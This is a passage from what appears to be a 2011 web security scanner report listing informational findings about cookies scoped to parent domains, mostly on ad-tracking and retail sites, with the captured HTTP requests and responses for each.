Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x4 pid 0x7f3c 32572
Cache-Control: no-cache
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Sun, 04 Sep 2011 00:55:52 GMT
Location: http://tag.admeld.com/match?admeld_adprovider_id=296&external_user_id=4e62cac5-3093-5789-301b-6f4e7fbf3921
Connection: Keep-Alive
Set-Cookie: ts=1315097752; domain=.mathtag.com; path=/; expires=Mon, 03-Sep-2012 00:55:52 GMT
Content-Length: 0

11.46. http://syndication.mmismm.com/tntwo.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://syndication.mmismm.com
Path:	/tntwo.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

U=WyBPG2WuR0m9hGPSaL94eQ--; expires=Sat, 03-Sep-2016 07:13:33 GMT; path=/; domain=.mmismm.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tntwo.php?mm_pub=7333&u=http%3A%2F%2Fblogs.sacbee.com%2Fthe_state_worker%2F%23navlink%3Dnavdrop&r=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&t=300?tm=330352 HTTP/1.1
Host: syndication.mmismm.com
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_12_4&protocol=http%3A&network=sacbee%3Ablogs_sacbee
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:13:33 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR BUS COM NAV"
Set-Cookie: U=WyBPG2WuR0m9hGPSaL94eQ--; expires=Sat, 03-Sep-2016 07:13:33 GMT; path=/; domain=.mmismm.com
Content-Length: 43
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/javascript

var msegs='';Mindset.handleResponse(msegs);

11.47. http://tacoda.at.atwola.com/rtx/r.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tacoda.at.atwola.com
Path:	/rtx/r.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; path=/; expires=Wed, 29-Aug-12 01:05:45 GMT; domain=.at.atwola.com
ATTAC=a3ZzZWc9OTk5OTk6; expires=Wed, 29-Aug-12 01:05:45 GMT; path=/; domain=.at.atwola.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:05:45 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sun, 04 Sep 2011 01:20:45 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; path=/; expires=Wed, 29-Aug-12 01:05:45 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=; path=/; expires=Sun, 11-Sep-11 01:05:45 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1315097086^1315100145|17778^1315097086^1315098886|11684^1315097306^1315100145; path=/; expires=Sun, 04-Sep-11 01:35:45 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^; expires=Wed, 29-Aug-12 01:05:45 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:b2269f69029173967deb3f16e3a72f92,b2269f69029173967deb3f16e3a72f92; expires=Wed, 29-Aug-12 01:05:45 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6; expires=Wed, 29-Aug-12 01:05:45 GMT; path=/; domain=.at.atwola.com
ntCoent-Length: 102
Content-Type: application/x-javascript
Content-Length: 102

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='1765ifu1akkc79';
var ANSL='99999|^';
ANRTXR();

11.48. http://tags.bluekai.com/site/4195 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/4195

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

bklc=4e62d0a8; expires=Tue, 06-Sep-2011 01:13:12 GMT; path=/; domain=.bluekai.com
bk=R+zBw0JX+9Fze1lp; expires=Fri, 02-Mar-2012 01:13:12 GMT; path=/; domain=.bluekai.com
bkc=KJh5ppXnxPWROFe77YEdRf+Jag/jk/tDhVCxEanrn529VjuuyVHHwGsJsm8vRzBQBFAvJGwJKUWbFUzT7UfNFm2pMC1cMZIO8XVruNCyke121n52h+6Wzn1Aon/9FkTsruZFwxXedGe9Tt0znTYjX+G85uoeRcKZFo2q/KbZhpuF4PJn+AkQXB2cl7C1KKtAKrXIJksI5R0MlaRSpeuFdRG928HWRtNX39oZNIBjA4rS8S8myDh2tAcbIyvyIXqc1U5+hWtl2Agj5qknWtf3bdf29EhDj89=; expires=Fri, 02-Mar-2012 01:13:12 GMT; path=/; domain=.bluekai.com
bkst=KJhMRjMYpzYQym9UAJTqPa3RqJCr7Zd3ZKL4RmGHajZUkN/RbZBoks4G5F2AACXnxf/99T1/x8JjZGZJLPkiLoZCujvOLSkaig7oiQ+J4Q9iBHVZ; expires=Fri, 02-Mar-2012 01:13:12 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/4195?id=b6f4436ac614b0358d75&?tm=915580 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_12_4&protocol=http%3A&network=sacbee%3Ablogs_sacbee
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=3yG99saNUAf9465B; bkou=KJye999999W=; bkst=KJhMRjMYpzYQym9UAJTqPa3RqJCr7Zd3ZKL4RmGHajZUkN/RbZBoks4G5F2AACX9O76Byy==; bk=myAUzYJX+9Fze1lp; bkc=KJhnasHQmYdOh1O6vLZwARsO/Hc/UX3J0G2CRRepol9p1nOh1enzwT7QbhG0GwOObZaXBuYt3tPQt9wA16c8RP0Gda96wAQdMcX/S1CbvxSsY3C8/wTbBe8/wRyFOUEFUMTZOoFpzxQIn0o4xGTOCxdueIBdTtaQrY7ehOY6OLWdT1i/y+I1hrXlxKV4PAckmlR0GwOO2LcT7YYdEt5QuYoaX9XtGdn5ske8/OgsUylAq2b10g5rHKVefWrWXQs3akys; bko=KJpgaVaQRe3P814/zWTRhonkRt9/VCw7hX/QYVDh1x99gXz/vx==; bkw5=KJypLs/9QAX1JT9A1TMJy1MyMS44CJcO0hRCyTQi/tucAsaYAUspOfWdxzVxjz05zzkAOpWymeaXRhOxOT7Bi9u8Q81no/SE0b6OHO8LjZOGYXvkF0xW3adMsT1mDJiPTD/G5F69ctTQdQ==; bkdc=sf; bklc=4e62ca02

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:13:12 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: bklc=4e62d0a8; expires=Tue, 06-Sep-2011 01:13:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bk=R+zBw0JX+9Fze1lp; expires=Fri, 02-Mar-2012 01:13:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh5ppXnxPWROFe77YEdRf+Jag/jk/tDhVCxEanrn529VjuuyVHHwGsJsm8vRzBQBFAvJGwJKUWbFUzT7UfNFm2pMC1cMZIO8XVruNCyke121n52h+6Wzn1Aon/9FkTsruZFwxXedGe9Tt0znTYjX+G85uoeRcKZFo2q/KbZhpuF4PJn+AkQXB2cl7C1KKtAKrXIJksI5R0MlaRSpeuFdRG928HWRtNX39oZNIBjA4rS8S8myDh2tAcbIyvyIXqc1U5+hWtl2Agj5qknWtf3bdf29EhDj89=; expires=Fri, 02-Mar-2012 01:13:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJhMRjMYpzYQym9UAJTqPa3RqJCr7Zd3ZKL4RmGHajZUkN/RbZBoks4G5F2AACXnxf/99T1/x8JjZGZJLPkiLoZCujvOLSkaig7oiQ+J4Q9iBHVZ; expires=Fri, 02-Mar-2012 01:13:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=sf; expires=Mon, 05-Sep-2011 01:13:12 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Mon, 05 Sep 2011 01:13:12 GMT
Cache-Control: max-age=86400, private
BK-Server: 160f
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!.. ....,...........L..;

11.49. http://tr.adinterax.com/re/mcclatchyinteractive%2CSAC_ccul_110425_brand_exp%2CC%3DSAC_CCUL%2CP%3DSAC%2CK%3D696749/0.17714067571796477/0/in%2Cti/ti.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tr.adinterax.com
Path:	/re/mcclatchyinteractive%2CSAC_ccul_110425_brand_exp%2CC%3DSAC_CCUL%2CP%3DSAC%2CK%3D696749/0.17714067571796477/0/in%2Cti/ti.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

adxid=01345f4e62cacd40; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
adxf=696749@1@221; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /re/mcclatchyinteractive%2CSAC_ccul_110425_brand_exp%2CC%3DSAC_CCUL%2CP%3DSAC%2CK%3D696749/0.17714067571796477/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:48:13 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxid=01345f4e62cacd40; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Set-Cookie: adxf=696749@1@221; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

11.50. http://tu.connect.wunderloop.net/TU/1/1/1/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tu.connect.wunderloop.net
Path:	/TU/1/1/1/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wlid=id%3Aa_6f76e8d5cf024e8471d7df3851e5a9fc%3A; expires=Wed, 29-Aug-2012 00:48:10 GMT; domain=.wunderloop.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /TU/1/1/1/ HTTP/1.1
Host: tu.connect.wunderloop.net
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wlid=id%3Aa_6f76e8d5cf024e8471d7df3851e5a9fc%3A

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:48:10 GMT
Server: Apache
P3P: policyref="http://connect.wunderloop.net/w3c/p3p.xml", CP="NOI PSAa PSDa OUR IND UNI CNT"
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 31 Oct 1989 14:06:29 GMT
Last-Modified: Thu, 31 Oct 1989 14:06:29 GMT
Set-Cookie: wlid=id%3Aa_6f76e8d5cf024e8471d7df3851e5a9fc%3A; expires=Wed, 29-Aug-2012 00:48:10 GMT; domain=.wunderloop.net; Path=/
X-Cnection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

11.51. http://www.bizographics.com/collect/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bizographics.com
Path:	/collect/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

BizoID=6439dd87-a6df-42d4-8c18-e9c26d5d40b4; Domain=.bizographics.com; Expires=Sun, 04-Mar-2012 12:48:10 GMT; Path=/
BizoData=Pp1FHRK43ZweORIlfkWqu9Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KZiiM5m7MKDWeaj5XcunNcMDa7Re6IGD4lFbK4oBwEGr9Ad6xyMUDLG6hh7sErqHyaoEyKUrunjtqgDfn74jNwcPJZXKAa9DdLgeLHSyEVCqewehdQ95muedOoesP2U0B4uSKJipWuwJodXwOG6Ckz6TNNGdaF6nEbrp2RisySjMfspmIzmbswoNZ5qPldy6c1wwH4DELwm2ipwN9AFjATkbkUDTbwiiAhQOisLU5UVO9T0RLQPyXdljTHnfyBp1sJ7Vvkc46t01cWfT12ipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6nc4wINO1L7830xNl7tETxisz59RGoQec9s3m5pebWcHCAieie; Domain=.bizographics.com; Expires=Sun, 04-Mar-2012 12:48:10 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /collect/?fmt=gif&url=reuters.com&pid=501 HTTP/1.1
Host: www.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
Cache-Control: max-age=0
If-Modified-Since: Thu, 04 Aug 2011 17:51:39 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
If-None-Match: "221d8352905f2c38b3cb2bd191d630b0"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=6439dd87-a6df-42d4-8c18-e9c26d5d40b4; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KXs4bdFipkUfSaj5XcunNcMDa7Re6IGD4lBvQyxxHPmw0Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtQD6vWJNOjnJHrfysIJUvFEEVUJBxdqAyCnhnIK7WDp3tGB8GRrS9YqGZ21tipbuEa4ipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Content-Language: en-US
Date: Sun, 04 Sep 2011 00:48:10 GMT
Location: http://img.bizographics.com/1x1.gif
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=6439dd87-a6df-42d4-8c18-e9c26d5d40b4; Domain=.bizographics.com; Expires=Sun, 04-Mar-2012 12:48:10 GMT; Path=/
Set-Cookie: BizoData=Pp1FHRK43ZweORIlfkWqu9Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KZiiM5m7MKDWeaj5XcunNcMDa7Re6IGD4lFbK4oBwEGr9Ad6xyMUDLG6hh7sErqHyaoEyKUrunjtqgDfn74jNwcPJZXKAa9DdLgeLHSyEVCqewehdQ95muedOoesP2U0B4uSKJipWuwJodXwOG6Ckz6TNNGdaF6nEbrp2RisySjMfspmIzmbswoNZ5qPldy6c1wwH4DELwm2ipwN9AFjATkbkUDTbwiiAhQOisLU5UVO9T0RLQPyXdljTHnfyBp1sJ7Vvkc46t01cWfT12ipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6nc4wINO1L7830xNl7tETxisz59RGoQec9s3m5pebWcHCAieie; Domain=.bizographics.com; Expires=Sun, 04-Mar-2012 12:48:10 GMT; Path=/
Content-Length: 0
Connection: keep-alive

11.52. https://www.linkedin.com/secure/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.linkedin.com
Path:	/secure/login

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /secure/login HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.53. http://www.personalcreations.com/apparel-gifts-her-PHERAPP previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/apparel-gifts-her-PHERAPP

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:23:53 PM?0&9/3/2011 6:24:05 PM?0&9/3/2011 6:24:33 PM?0&9/3/2011 6:25:01 PM?0&9/3/2011 6:24:49 PM?0&9/3/2011 6:25:00 PM?0&9/3/2011 6:25:19 PM?0&9/3/2011 6:26:43 PM?0&9/3/2011 6:26:58 PM?0&9/3/2011 6:27:20 PM?0&9/3/2011 6:27:30 PM?0&9/3/2011 6:27:56 PM?0&9/3/2011 6:27:25 PM?0&9/3/2011 6:27:59 PM?0&9/3/2011 6:28:09 PM?0&9/3/2011 6:28:46 PM?0&9/3/2011 6:28:53 PM?0&9/3/2011 6:29:28 PM?0&9/3/2011 6:30:05 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:30:05 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /apparel-gifts-her-PHERAPP HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.54. http://www.personalcreations.com/grandparents-day-gifts-PGDPDAY previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/grandparents-day-gifts-PGDPDAY

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:19:10 PM?0&9/3/2011 6:19:46 PM?0&9/3/2011 6:19:40 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:40 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /grandparents-day-gifts-PGDPDAY HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.55. http://www.personalcreations.com/halloween-home-decorations-PHALHOM previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/halloween-home-decorations-PHALHOM

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:18:53 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:19:49 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:49 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /halloween-home-decorations-PHALHOM HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.56. http://www.personalcreations.com/just-because-gifts-PJBEBSL previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/just-because-gifts-PJBEBSL

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:23:53 PM?0&9/3/2011 6:24:05 PM?0&9/3/2011 6:24:33 PM?0&9/3/2011 6:25:01 PM?0&9/3/2011 6:24:49 PM?0&9/3/2011 6:25:00 PM?0&9/3/2011 6:25:19 PM?0&9/3/2011 6:26:43 PM?0&9/3/2011 6:26:58 PM?0&9/3/2011 6:27:20 PM?0&9/3/2011 6:27:30 PM?0&9/3/2011 6:27:56 PM?0&9/3/2011 6:27:14 PM?0&9/3/2011 6:27:54 PM?0&9/3/2011 6:28:09 PM?0&9/3/2011 6:28:10 PM?0&9/3/2011 6:28:30 PM?0&9/3/2011 6:28:03 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:28:03 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /just-because-gifts-PJBEBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.57. http://www.personalcreations.com/personalized-anniversary-gifts-PANNBSL previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/personalized-anniversary-gifts-PANNBSL

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:19:10 PM?0&9/3/2011 6:19:46 PM?0&9/3/2011 6:19:48 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:48 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-anniversary-gifts-PANNBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.58. http://www.personalcreations.com/personalized-back-to-school-gifts-PBKDB2S previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/personalized-back-to-school-gifts-PBKDB2S

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:18:53 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:19:49 PM?0&9/3/2011 6:19:56 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:56 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-back-to-school-gifts-PBKDB2S HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.59. http://www.personalcreations.com/personalized-birthday-gifts-PBIRBSL previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/personalized-birthday-gifts-PBIRBSL

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:18:53 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:19:13 PM?0&9/3/2011 6:20:03 PM?0&9/3/2011 6:19:51 PM?0&9/3/2011 6:19:27 PM?0&9/3/2011 6:19:46 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:46 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-birthday-gifts-PBIRBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.60. http://www.personalcreations.com/personalized-birthday-gifts-her-PHERBIR previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/personalized-birthday-gifts-her-PHERBIR

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

